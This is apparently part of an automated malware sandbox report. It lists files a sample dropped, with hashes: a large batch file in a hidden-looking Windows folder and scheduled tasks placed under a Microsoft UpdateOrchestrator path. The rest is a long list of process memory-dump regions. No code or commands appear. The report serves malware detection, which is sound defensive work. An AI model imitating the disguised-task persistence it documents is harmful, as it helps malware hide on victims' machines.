                                                                                                                                    SHA256

                                                                                                                                    878df6f755578e2e79d0e6fd350f5b4430e0e42bb4bc8757afb97999bc405ba4

                                                                                                                                    SHA512

                                                                                                                                    cb7253de88bd351f8bcb5dc0b5760d3d2875d39f601396a4250e06ead9e7edeffcd94fa23f392833f450c983a246952f2bad3a40f84aff2adc0f7d0eb408d03c

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Windows\$rbx-onimai2\$rbx-CO2.bat
                                                                                                                                    Filesize

                                                                                                                                    7.0MB

                                                                                                                                    MD5

                                                                                                                                    1a013c7ac90b58073895b26cae70def7

                                                                                                                                    SHA1

                                                                                                                                    60c9c3294fc7ac3d336a478274f62f4818498230

                                                                                                                                    SHA256

                                                                                                                                    698b1f0a35a76e57adef388612b29902f86f56983c772d7c6c17b4483c2be688

                                                                                                                                    SHA512

                                                                                                                                    c1bbb52e8546b352e041e944d7dfa158d5dc9a51b1628128d345e4a9e708871d7a1f5e59cc44a2c66f8dc9af81ec06e1b5105d5a7292497075564496f3b0ec75

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                                    Filesize

                                                                                                                                    2KB

                                                                                                                                    MD5

                                                                                                                                    4ac1741ceb19f5a983079b2c5f344f5d

                                                                                                                                    SHA1

                                                                                                                                    f1ebd93fbade2e035cd59e970787b8042cdd0f3b

                                                                                                                                    SHA256

                                                                                                                                    7df73f71214cdd2f2d477d6c2c65f6e4c2f5955fc669cde9c583b0ff9553ecdc

                                                                                                                                    SHA512

                                                                                                                                    583706069a7c0b22926fa22fc7bedcca9d6750d1542a1125b688fbb0595baf6cefc76e7b6e49c1415c782a21d0dd504c78fa36efad5f29f2fd5d69cc45ad8dcd

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                                    Filesize

                                                                                                                                    2KB

                                                                                                                                    MD5

                                                                                                                                    a9124c4c97cba8a07a8204fac1696c8e

                                                                                                                                    SHA1

                                                                                                                                    1f27d80280e03762c7b16781608786f5a98ff434

                                                                                                                                    SHA256

                                                                                                                                    8ad3d28aeff847bc5fb8035cbc7c71e88a4ee547821a8e1a3ea6661ee6014b21

                                                                                                                                    SHA512

                                                                                                                                    537caaa75ac1e257c6b247f9680c3b9e79156ea1bcb3f1326e969a774db33b3c906800813ca6f79369c799a62f4260c91c6dd9a6cace3af25b7dbea5a73e0392

                                                                                                                                    Download Submit

                                                                                                                                  • memory/612-45-0x0000026E2F360000-0x0000026E2F38A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/612-72-0x0000026E2F330000-0x0000026E2F354000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    144KB

                                                                                                                                    Download

                                                                                                                                  • memory/612-1209-0x0000026E2F330000-0x0000026E2F354000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    144KB

                                                                                                                                    Download

                                                                                                                                  • memory/612-32-0x0000026E2F330000-0x0000026E2F354000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    144KB

                                                                                                                                    Download

                                                                                                                                  • memory/612-33-0x0000026E2F360000-0x0000026E2F38A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/612-34-0x0000026E2F360000-0x0000026E2F38A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/612-42-0x0000026E2F360000-0x0000026E2F38A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/612-43-0x0000026E2F360000-0x0000026E2F38A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/612-44-0x0000026E2F360000-0x0000026E2F38A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/612-48-0x0000026E2F360000-0x0000026E2F38A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/612-46-0x0000026E2F360000-0x0000026E2F38A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/612-73-0x00007FFA6C9CD000-0x00007FFA6C9CE000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                    Download

                                                                                                                                  • memory/612-74-0x00007FFA6C9CF000-0x00007FFA6C9D0000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                    Download

                                                                                                                                  • memory/612-47-0x00007FFA2C9B0000-0x00007FFA2C9C0000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                    Download

                                                                                                                                  • memory/680-52-0x0000028BA1280000-0x0000028BA12AA000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/680-65-0x00007FFA2C9B0000-0x00007FFA2C9C0000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                    Download

                                                                                                                                  • memory/680-60-0x0000028BA1280000-0x0000028BA12AA000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/680-61-0x0000028BA1280000-0x0000028BA12AA000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/680-63-0x0000028BA1280000-0x0000028BA12AA000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/680-75-0x0000028BA1250000-0x0000028BA1274000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    144KB

                                                                                                                                    Download

                                                                                                                                  • memory/680-64-0x0000028BA1280000-0x0000028BA12AA000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/680-1210-0x0000028BA1250000-0x0000028BA1274000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    144KB

                                                                                                                                    Download

                                                                                                                                  • memory/680-66-0x0000028BA1280000-0x0000028BA12AA000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/680-62-0x0000028BA1280000-0x0000028BA12AA000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/976-87-0x0000027FA5700000-0x0000027FA572A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/976-86-0x0000027FA5700000-0x0000027FA572A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/976-76-0x0000027FA5700000-0x0000027FA572A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/976-84-0x0000027FA5700000-0x0000027FA572A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/976-85-0x0000027FA5700000-0x0000027FA572A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                    Download

                                                                                                                                  • memory/1364-28-0x00007FFA6AC30000-0x00007FFA6ACED000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    756KB

                                                                                                                                    Download

                                                                                                                                  • memory/1364-22-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    32KB

                                                                                                                                    Download

                                                                                                                                  • memory/1364-29-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    32KB

                                                                                                                                    Download

                                                                                                                                  • memory/1364-27-0x00007FFA6C930000-0x00007FFA6CB28000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    2.0MB

                                                                                                                                    Download

                                                                                                                                  • memory/1364-24-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    32KB

                                                                                                                                    Download

                                                                                                                                  • memory/1364-26-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    32KB

                                                                                                                                    Download

                                                                                                                                  • memory/1364-20-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    32KB

                                                                                                                                    Download

                                                                                                                                  • memory/1364-21-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    32KB

                                                                                                                                    Download

                                                                                                                                  • memory/1780-2504-0x000001D4F5C10000-0x000001D4F5C1E000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    56KB

                                                                                                                                    Download

                                                                                                                                  • memory/2044-19-0x00007FFA6AC30000-0x00007FFA6ACED000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    756KB

                                                                                                                                    Download

                                                                                                                                  • memory/2044-15-0x0000013CDF690000-0x0000013CDF706000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    472KB

                                                                                                                                    Download

                                                                                                                                  • memory/2044-92-0x00007FFA4E180000-0x00007FFA4EC42000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    10.8MB

                                                                                                                                    Download

                                                                                                                                  • memory/2044-93-0x0000013C802C0000-0x0000013C80632000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    3.4MB

                                                                                                                                    Download

                                                                                                                                  • memory/2044-94-0x00007FFA4E180000-0x00007FFA4EC42000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    10.8MB

                                                                                                                                    Download

                                                                                                                                  • memory/2044-18-0x00007FFA6C930000-0x00007FFA6CB28000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    2.0MB

                                                                                                                                    Download

                                                                                                                                  • memory/2044-69-0x00007FFA4E183000-0x00007FFA4E185000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    8KB

                                                                                                                                    Download

                                                                                                                                  • memory/2044-17-0x0000013CFF970000-0x0000013CFFDB6000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    4.3MB

                                                                                                                                    Download

                                                                                                                                  • memory/2044-16-0x0000013CC4C40000-0x0000013CC4C7A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    232KB

                                                                                                                                    Download

                                                                                                                                  • memory/2044-12-0x00007FFA4E180000-0x00007FFA4EC42000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    10.8MB

                                                                                                                                    Download

                                                                                                                                  • memory/2044-1214-0x00007FFA4E180000-0x00007FFA4EC42000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    10.8MB

                                                                                                                                    Download

                                                                                                                                  • memory/2044-0-0x00007FFA4E183000-0x00007FFA4E185000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    8KB

                                                                                                                                    Download

                                                                                                                                  • memory/2044-14-0x0000013CDF5C0000-0x0000013CDF604000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    272KB

                                                                                                                                    Download

                                                                                                                                  • memory/2044-13-0x00007FFA4E180000-0x00007FFA4EC42000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    10.8MB

                                                                                                                                    Download

                                                                                                                                  • memory/2044-1-0x0000013CDCF80000-0x0000013CDCFA2000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    136KB

                                                                                                                                    Download

                                                                                                                                  • memory/2044-2-0x00007FFA4E180000-0x00007FFA4EC42000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    10.8MB

                                                                                                                                    Download

                                                                                                                                  • memory/2044-71-0x00007FFA4E180000-0x00007FFA4EC42000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    10.8MB

                                                                                                                                    Download

                                                                                                                                  • memory/3168-1670-0x0000016DEF200000-0x0000016DEF96C000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    7.4MB

                                                                                                                                    Download

                                                                                                                                  • memory/3168-2110-0x0000016DF0CA0000-0x0000016DF0E62000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    1.8MB

                                                                                                                                    Download

                                                                                                                                  • memory/3168-3017-0x0000016DEFA10000-0x0000016DEFA22000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    72KB

                                                                                                                                    Download

                                                                                                                                  • memory/3168-3018-0x0000016DF08F0000-0x0000016DF092C000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    240KB

                                                                                                                                    Download

                                                                                                                                  • memory/3168-2108-0x0000016DF0C50000-0x0000016DF0CA0000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    320KB

                                                                                                                                    Download

                                                                                                                                  • memory/3168-2109-0x0000016DF0970000-0x0000016DF0A22000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    712KB

                                                                                                                                    Download